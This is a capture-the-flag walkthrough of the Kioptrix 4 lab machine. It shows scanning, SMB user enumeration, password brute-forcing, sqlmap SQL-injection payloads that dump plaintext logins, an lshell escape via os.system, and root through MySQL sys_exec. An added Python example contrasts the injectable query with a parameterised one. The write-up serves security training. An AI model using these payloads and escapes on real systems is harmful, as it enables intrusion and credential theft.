Starting with a quick scan:
nmap -Pn -T4 192.168.79.0/24
Starting Nmap 7.70SVN ( https://nmap.org ) at 2019-06-06 08:48 ADT
Nmap scan report for 192.168.79.217
Host is up (0.00032s latency).
Not shown: 566 closed ports, 430 filtered ports
PORT STATE SERVICE
22/tcp open ssh
80/tcp open http
139/tcp open netbios-ssn
445/tcp open microsoft-ds
MAC Address: 00:0C:29:CF:86:2E (VMware)
My goal today is to do this box as fast as possible.
Going to the webpage:
Running Nikto:
nikto -host http://192.168.79.217 -output nikto.txt
- Nikto v2.1.6
---------------------------------------------------------------------------
+ Target IP: 192.168.79.217
+ Target Hostname: 192.168.79.217
+ Target Port: 80
+ Start Time: 2019-06-06 08:52:20 (GMT-3)
---------------------------------------------------------------------------
+ Server: Apache/2.2.8 (Ubuntu) PHP/5.2.4-2ubuntu5.6 with Suhosin-Patch
+ Retrieved x-powered-by header: PHP/5.2.4-2ubuntu5.6
+ The anti-clickjacking X-Frame-Options header is not present.
+ The X-XSS-Protection header is not defined. This header can hint to the user agent to protect against some forms of XSS
+ The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type
+ Uncommon header 'tcn' found, with contents: list
+ Apache mod_negotiation is enabled with MultiViews, which allows attackers to easily brute force file names. See http://www.wisec.it/sectou.php?id=4698ebdc59d15. The following alternatives for 'index' were found: index.php
+ Apache/2.2.8 appears to be outdated (current is at least Apache/2.4.37). Apache 2.2.34 is the EOL for the 2.x branch.
+ PHP/5.2.4-2ubuntu5.6 appears to be outdated (current is at least 7.2.12). PHP 5.6.33, 7.0.27, 7.1.13, 7.2.1 may also current release for each branch.
+ Web Server returns a valid response with junk HTTP methods, this may cause false positives.
+ OSVDB-877: HTTP TRACE method is active, suggesting the host is vulnerable to XST
+ OSVDB-12184: /?=PHPB8B5F2A0-3C92-11d3-A3A9-4C7B08C10000: PHP reveals potentially sensitive information via certain HTTP requests that contain specific QUERY strings.
+ OSVDB-12184: /?=PHPE9568F36-D428-11d2-A769-00AA001ACF42: PHP reveals potentially sensitive information via certain HTTP requests that contain specific QUERY strings.
+ OSVDB-12184: /?=PHPE9568F34-D428-11d2-A769-00AA001ACF42: PHP reveals potentially sensitive information via certain HTTP requests that contain specific QUERY strings.
+ OSVDB-12184: /?=PHPE9568F35-D428-11d2-A769-00AA001ACF42: PHP reveals potentially sensitive information via certain HTTP requests that contain specific QUERY strings.
+ OSVDB-3268: /icons/: Directory indexing found.
+ OSVDB-3268: /images/: Directory indexing found.
+ Server may leak inodes via ETags, header found with file /icons/README, inode: 98933, size: 5108, mtime: Tue Aug 28 07:48:10 2007
+ OSVDB-3233: /icons/README: Apache default file found.
+ Cookie PHPSESSID created without the httponly flag
+ 8724 requests: 0 error(s) and 19 item(s) reported on remote host
+ End Time: 2019-06-06 08:52:34 (GMT-3) (14 seconds)
---------------------------------------------------------------------------
Then gobuster:
gobuster -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -u http://192.168.79.217 -o gobuster.txt
/index (Status: 200)
/images (Status: 301)
/member (Status: 302)
/logout (Status: 302)
/john (Status: 301)
/robert (Status: 301)
/server-status (Status: 403)
While it’s running, I send the page to Burp:
POST /checklogin.php HTTP/1.1
Host: 192.168.79.217
User-Agent: Mozilla/4.0 (compatible; Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.13) Gecko/20060414; Windows NT 5.1)
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://192.168.79.217/
Content-Type: application/x-www-form-urlencoded
Content-Length: 44
Cookie: PHPSESSID=cca8c9b6b000df9f7870bbf98bdba878
Connection: close
Upgrade-Insecure-Requests: 1
myusername=erik&mypassword=erik&Submit=Login
Response:
HTTP/1.1 200 OK
Date: Thu, 06 Jun 2019 08:59:31 GMT
Server: Apache/2.2.8 (Ubuntu) PHP/5.2.4-2ubuntu5.6 with Suhosin-Patch
X-Powered-By: PHP/5.2.4-2ubuntu5.6
Content-Length: 109
Connection: close
Content-Type: text/html
Wrong Username or Password<form method="link" action="index.php"><input type=submit value="Try Again"></form>
Not much there
Scanning for SMB vuln:
nmap -p 445 -vv --script=smb-vuln-cve2009-3103.nse,smb-vuln-ms06-025.nse,smb-vuln-ms07-029.nse,smb-vuln-ms08-067.nse,smb-vuln-ms10-054.nse,smb-vuln-ms10-061.nse,smb-vuln-ms17-010.nse 192.168.79.217
PORT STATE SERVICE REASON
445/tcp open microsoft-ds syn-ack ttl 64
MAC Address: 00:0C:29:CF:86:2E (VMware)
Host script results:
|_smb-vuln-ms10-054: false
|_smb-vuln-ms10-061: false
Nothing
Running dotdotpwn (directory traversal) in the meantime, and Burp Intruder against the login form for SQL injection.
Scanning SMB shares:
nmap -p 445 -vv --script=smb-enum-shares.nse,smb-enum-users.nse 192.168.79.217
PORT STATE SERVICE REASON
445/tcp open microsoft-ds syn-ack ttl 64
MAC Address: 00:0C:29:CF:86:2E (VMware)
Host script results:
| smb-enum-shares:
| account_used: guest
| \\192.168.79.217\IPC$:
| Type: STYPE_IPC_HIDDEN
| Comment: IPC Service (Kioptrix4 server (Samba, Ubuntu))
| Users: 1
| Max Users: <unlimited>
| Path: C:\tmp
| Anonymous access: READ/WRITE
| Current user access: READ/WRITE
| \\192.168.79.217\print$:
| Type: STYPE_DISKTREE
| Comment: Printer Drivers
| Users: 0
| Max Users: <unlimited>
| Path: C:\var\lib\samba\printers
| Anonymous access: <none>
|_ Current user access: <none>
|_smb-enum-users: ERROR: Script execution failed (use -d to debug)
Maybe something.
smbclient //192.168.79.217/IPC$
Enter WORKGROUP\root's password:
Anonymous login successful
Try "help" to get a list of possible commands.
smb: \> dir
NT_STATUS_NETWORK_ACCESS_DENIED listing \*
Nothing there
Trying a null session with rpcclient:
rpcclient -U "" 192.168.79.217
Seems to be working.
rpcclient $> enumdomusers
user:[nobody] rid:[0x1f5]
user:[robert] rid:[0xbbc]
user:[root] rid:[0x3e8]
user:[john] rid:[0xbba]
user:[loneferret] rid:[0xbb8]
We now have a list of users!
We can start trying to crack the password:
wfuzz -w /usr/share/seclists/Passwords/darkc0de.txt -d "myusername=john&mypassword=FUZZ&Submit=Login" --hc 200 -u http://192.168.79.217
Also trying hydra on ssh:
hydra -l john -P darkc0de.txt 192.168.79.217 ssh
Both returned nothing
Trying sqlmap:
sqlmap --level 3 --risk 3 -u http://192.168.79.217/checklogin.php --data "myusername=erik&mypassword=password&Submit=Login" --method POST --dbms MYSQL
[11:45:49] [INFO] checking if the injection point on POST parameter 'mypassword' is a false positive
POST parameter 'mypassword' is vulnerable. Do you want to keep testing the others (if any)? [y/N] n
sqlmap identified the following injection point(s) with a total of 2297 HTTP(s) requests:
---
Parameter: mypassword (POST)
Type: boolean-based blind
Title: OR boolean-based blind - WHERE or HAVING clause
Payload: myusername=erik&mypassword=-4226' OR 5600=5600-- bMfZ&Submit=Login
Type: time-based blind
Title: MySQL >= 5.0.12 OR time-based blind
Payload: myusername=erik&mypassword=password' OR SLEEP(5)-- WzXE&Submit=Login
---
[11:46:01] [INFO] the back-end DBMS is MySQL
web server operating system: Linux Ubuntu 8.04 (Hardy Heron)
web application technology: PHP 5.2.4, Apache 2.2.8
back-end DBMS: MySQL >= 5.0.12
[11:46:01] [INFO] fetched data logged to text files under '/root/.sqlmap/output/192.168.79.217'
[*] ending @ 11:46:01 /2019-06-06/
sqlmap got a 302 redirect to 'http://192.168.79.217:80/login_success.php?username=erik'. Do you want to follow? [Y/n] n
1
[11:51:00] [INFO] retrieved: members
[11:51:00] [INFO] fetching columns for table 'members' in database 'members'
[11:51:00] [INFO] retrieved: 3
[11:51:00] [INFO] retrieved: id
[11:51:01] [INFO] retrieved: username
[11:51:01] [INFO] retrieved: password
[11:51:01] [INFO] fetching entries for table 'members' in database 'members'
[11:51:01] [INFO] fetching number of entries for table 'members' in database 'members'
[11:51:01] [INFO] retrieved: 2
[11:51:02] [INFO] retrieved: 1
[11:51:02] [INFO] retrieved: MyNameIsJohn
[11:51:02] [INFO] retrieved: john
[11:51:03] [INFO] retrieved: 2
[11:51:03] [INFO] retrieved: ADGAdsafdfwt4gadfga==
[11:51:04] [INFO] retrieved: robert
Database: members
Table: members
[2 entries]
+----+----------+-----------------------+
| id | username | password              |
+----+----------+-----------------------+
| 1  | john     | MyNameIsJohn          |
| 2  | robert   | ADGAdsafdfwt4gadfga== |
+----+----------+-----------------------+
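To show why checklogin.php falls to the boolean-based payload sqlmap reported, here is an added example (not code from the page or from the Kioptrix VM) that rebuilds the dumped members table in an in-memory SQLite database and runs the login query two ways: concatenated the way the form evidently builds it, and as a parameterised statement. Python with SQLite standing in for PHP/MySQL is an assumption; the ids, usernames, passwords and payload are the page's own.

```python
import sqlite3

# Constructed copy of the 'members' table as sqlmap dumped it (values from
# the page; the table is built in memory so the example runs offline).
MEMBERS = [(1, "john", "MyNameIsJohn"), (2, "robert", "ADGAdsafdfwt4gadfga==")]

# The boolean-based blind payload sqlmap reported for the mypassword field.
PAYLOAD = "-4226' OR 5600=5600-- bMfZ"


def make_db():
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE members (id INTEGER, username TEXT, password TEXT)")
    conn.executemany("INSERT INTO members VALUES (?, ?, ?)", MEMBERS)
    return conn


def login_vulnerable(conn, username, password):
    """Mirrors what checklogin.php evidently does: the submitted values are
    pasted into the SQL text, so the quote in the payload closes the string
    literal, 'OR 5600=5600' is evaluated as SQL, and '--' comments out the
    trailing quote. AND binds tighter than OR, so every row matches."""
    sql = ("SELECT username FROM members WHERE username='%s' AND password='%s'"
           % (username, password))
    row = conn.execute(sql).fetchone()
    return row[0] if row else None


def login_hardened(conn, username, password):
    """Same query as a parameterised statement: the values travel separately
    from the SQL text, so quotes and comment markers in the password are just
    characters to compare against the stored value."""
    sql = "SELECT username FROM members WHERE username=? AND password=?"
    row = conn.execute(sql, (username, password)).fetchone()
    return row[0] if row else None


if __name__ == "__main__":
    db = make_db()
    # 'erik' does not exist, yet the concatenated query logs in as the first row.
    print("vulnerable:", login_vulnerable(db, "erik", PAYLOAD))  # john
    print("hardened:  ", login_hardened(db, "erik", PAYLOAD))    # None
```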
I tried john and I can login but then nothing:
Same for Robert…
Trying ssh:
ssh john@192.168.79.217
The authenticity of host '192.168.79.217 (192.168.79.217)' can't be established.
RSA key fingerprint is SHA256:3fqlLtTAindnY7CGwxoXJ9M2rQF6nn35SFMTVv56lww.
Are you sure you want to continue connecting (yes/no)? yes
Warning: Permanently added '192.168.79.217' (RSA) to the list of known hosts.
john@192.168.79.217's password:
Welcome to LigGoat Security Systems - We are Watching
== Welcome LigGoat Employee ==
LigGoat Shell is in place so you don't screw up
Type '?' or 'help' to get the list of allowed commands
john:~$
Bingo!
But both accounts are very restricted, with only a few commands available:
Welcome to LigGoat Security Systems - We are Watching
== Welcome LigGoat Employee ==
LigGoat Shell is in place so you don't screw up
Type '?' or 'help' to get the list of allowed commands
robert:~$ cd /home/robert
robert:~$ ll
total 0
robert:~$ help
cd clear echo exit help ll lpath ls
robert:~$ lpath
Allowed:
/home/robert
Trying to create a file:
robert:~$ echo "1">1.txt
*** forbidden syntax -> "echo "1">1.txt"
*** You have 0 warning(s) left, before getting kicked out.
This incident has been reported.
robert:~$ echo 1
1
robert:~$ echo <?php phpinfo()?>
*** forbidden syntax -> "echo <?php phpinfo()?>"
*** Kicked out
Looks like the SMB password is the same:
root@kali:~/boxes/kioptrix# smbclient -U john //192.168.79.217/IPC$
Enter WORKGROUP\john's password:
Try "help" to get a list of possible commands.
smb: \> help
? allinfo altname archive backup
blocksize cancel case_sensitive cd chmod
chown close del deltree dir
du echo exit get getfacl
geteas hardlink help history iosize
lcd link lock lowercase ls
l mask md mget mkdir
more mput newer notify open
posix posix_encrypt posix_open posix_mkdir posix_rmdir
posix_unlink posix_whoami print prompt put
pwd q queue quit readlink
rd recurse reget rename reput
rm rmdir showacls setea setmode
scopy stat symlink tar tarmode
timeout translate unlock volume vuid
wdel logon listconnect showconnect tcon
tdis tid utimes logoff ..
!
but then nothing…
Trying the printer:
smbclient -U robert //192.168.79.217/print$
Enter WORKGROUP\robert's password:
Try "help" to get a list of possible commands.
smb: \> dir
. D 0 Sat Feb 4 10:57:48 2012
.. D 0 Sat Feb 4 11:16:24 2012
W32X86 D 0 Mon Mar 9 07:25:45 2009
WIN40 D 0 Mon Mar 9 07:25:45 2009
4916892 blocks of size 1024. 3581296 blocks available
Went back to lshell…
Found a way to escalate:
ssh john@192.168.79.217
john@192.168.79.217's password:
Welcome to LigGoat Security Systems - We are Watching
== Welcome LigGoat Employee ==
LigGoat Shell is in place so you don't screw up
Type '?' or 'help' to get the list of allowed commands
john:~$ echo os.system('/bin/bash')
john@Kioptrix4:~$ ll
bash: ll: command not found
john@Kioptrix4:~$ alias ll="ls -al"
john@Kioptrix4:~$ ll
total 28
drwxr-xr-x 2 john john 4096 2012-02-04 18:39 .
drwxr-xr-x 5 root root 4096 2012-02-04 18:05 ..
-rw------- 1 john john 61 2012-02-04 23:31 .bash_history
-rw-r--r-- 1 john john 220 2012-02-04 18:04 .bash_logout
-rw-r--r-- 1 john john 2940 2012-02-04 18:04 .bashrc
-rw-r--r-- 1 john john 312 2019-06-06 08:46 .lhistory
-rw-r--r-- 1 john john 586 2012-02-04 18:04 .profile
Weird... The flag is readable by everyone:
cd /root
john@Kioptrix4:/root$ ll
total 44
drwxr-xr-x 4 root root 4096 2012-02-06 18:46 .
drwxr-xr-x 21 root root 4096 2012-02-06 18:41 ..
-rw------- 1 root root 59 2012-02-06 20:24 .bash_history
-rw-r--r-- 1 root root 2227 2007-10-20 07:51 .bashrc
-rw-r--r-- 1 root root 625 2012-02-06 10:48 congrats.txt
-rw-r--r-- 1 root root 1 2012-02-05 10:38 .lhistory
drwxr-xr-x 8 loneferret loneferret 4096 2012-02-04 17:01 lshell-0.9.12
-rw------- 1 root root 1 2012-02-05 10:38 .mysql_history
-rw------- 1 root root 5 2012-02-06 18:38 .nano_history
-rw-r--r-- 1 root root 141 2007-10-20 07:51 .profile
drwx------ 2 root root 4096 2012-02-06 11:43 .ssh
john@Kioptrix4:/root$ cat congrats.txt
Congratulations!
You’ve got root.
There is more then one way to get root on this system. Try and find them.
I’ve only tested two (2) methods, but it doesn’t mean there aren’t more.
As always there’s an easy way, and a not so easy way to pop this box.
Look for other methods to get root privileges other than running an exploit.
It took a while to make this. For one it’s not as easy as it may look, and
also work and family life are my priorities. Hobbies are low on my list.
Really hope you enjoyed this one.
If you haven’t already, check out the other VMs available on:
www.kioptrix.com
Thanks for playing,
--------------------------------
So still searching!
MySQL is running as root:
mysql> select sys_exec('id > /tmp/out; chown john.john /tmp/out');
+-----------------------------------------------------+
| sys_exec('id > /tmp/out; chown john.john /tmp/out') |
+-----------------------------------------------------+
| NULL                                                |
+-----------------------------------------------------+
1 row in set (0.02 sec)
mysql> \! sh
$ cat /tmp/out
uid=0(root) gid=0(root)
$ cd /root
$ ls
congrats.txt lshell-0.9.12
$ cat congrats.txt
Congratulations!
You’ve got root.
There is more then one way to get root on this system. Try and find them.
I’ve only tested two (2) methods, but it doesn’t mean there aren’t more.
As always there’s an easy way, and a not so easy way to pop this box.
Look for other methods to get root privileges other than running an exploit.
It took a while to make this. For one it’s not as easy as it may look, and
also work and family life are my priorities. Hobbies are low on my list.
Really hope you enjoyed this one.
If you haven’t already, check out the other VMs available on:
www.kioptrix.com
Thanks for playing,
loneferret